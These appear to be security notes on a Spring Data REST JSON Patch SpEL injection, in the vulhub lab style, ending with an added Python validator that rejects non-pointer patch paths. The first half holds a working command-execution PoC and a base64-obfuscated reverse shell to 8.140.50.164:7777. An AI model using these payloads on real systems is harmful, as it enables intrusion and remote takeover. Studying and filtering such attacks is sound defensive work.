Summary

Framework security

1. Spring framework vulnerabilities

curl -X POST -H "Content-Type:application/json-patch+json" -d '{"firstname":"si","lastname":"Li"}' http://127.0.0.1:8080/customers
curl -X DELETE -H "Content-Type:application/json-patch+json" -d '{"firstname":"si","lastname":"Li"}' http://127.0.0.1:8080/customers/2

After modification:

PoC:

[{ "op": "replace", "path": 
"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname",
"value": "vulhub" }]

Here `new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}` represents the command `touch /tmp/success`: each character of the command is converted to its decimal byte value. The conversion can be done with the following Python code:

# Command string as raw bytes; iterating over bytes in Python 3 yields integers
payload = b'touch /tmp/success'
# Join the decimal value of every byte with commas, matching Java's new byte[]{...} syntax
bytecode = ','.join(str(i) for i in payload)
print(bytecode)

Reverse shell

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(
'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MC41MC4xNjQvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}')/lastname",
"value": "vulhub" }]

bash -i >& /dev/tcp/8.140.50.164/7777 0>&1

base64 encoding: YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MC41MC4xNjQvNzc3NyAwPiYx
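Both payloads above work because the `path` field of a JSON Patch operation, which should be a plain JSON Pointer such as `/lastname`, is instead handed to the SpEL evaluator, so a `T(java.lang.Runtime)` type reference is executed. Besides upgrading the framework, a request filter can reject any patch whose `path` or `from` is not a syntactically valid JSON Pointer. The following is an added illustration written for this page, not code from the original post or from Spring; the function and regex names are my own, and the two sample bodies are constructed after the shape of the PoC above.

```python
import json
import re

# RFC 6901 JSON Pointer: empty, or a sequence of "/" followed by a token.
# Tokens are restricted to word characters, "-" and the "~0"/"~1" escapes,
# which rules out the parentheses, dots, quotes and commas that SpEL needs.
_POINTER_RE = re.compile(r"^(/(?:[A-Za-z0-9_\-]|~[01])*)+$|^$")
_ALLOWED_OPS = {"add", "remove", "replace", "move", "copy", "test"}


def check_json_patch(body: str) -> list:
    """Return a list of problems found in a JSON Patch body; empty means it looks sane.

    Added example (not Spring's own code): it only checks that every operation is
    known and that 'path'/'from' are plain JSON Pointers, so a value like
    'T(java.lang.Runtime)...' is rejected before it reaches the application.
    """
    problems = []
    try:
        doc = json.loads(body)
    except ValueError as exc:
        return [f"invalid JSON: {exc}"]
    if not isinstance(doc, list):
        return ["JSON Patch body must be an array of operations"]
    for idx, op in enumerate(doc):
        if not isinstance(op, dict):
            problems.append(f"op {idx}: not an object")
            continue
        if op.get("op") not in _ALLOWED_OPS:
            problems.append(f"op {idx}: unknown op {op.get('op')!r}")
        for key in ("path", "from"):
            if key in op:
                value = op[key]
                if not isinstance(value, str) or not _POINTER_RE.match(value):
                    problems.append(f"op {idx}: {key} is not a JSON Pointer: {value!r}")
    return problems


# Constructed sample bodies: a legitimate patch and one using the SpEL type-reference
# prefix from the PoC above (command part omitted; the prefix alone is enough to reject).
BENIGN_PATCH = '[{"op": "replace", "path": "/lastname", "value": "Wang"}]'
SPEL_PATCH = '[{"op": "replace", "path": "T(java.lang.Runtime).getRuntime()/lastname", "value": "vulhub"}]'

if __name__ == "__main__":
    print(check_json_patch(BENIGN_PATCH))  # []
    print(check_json_patch(SPEL_PATCH))    # one 'path is not a JSON Pointer' problem
```

The check is a defence-in-depth layer for logging and blocking; it does not replace patching the vulnerable Spring Data REST version.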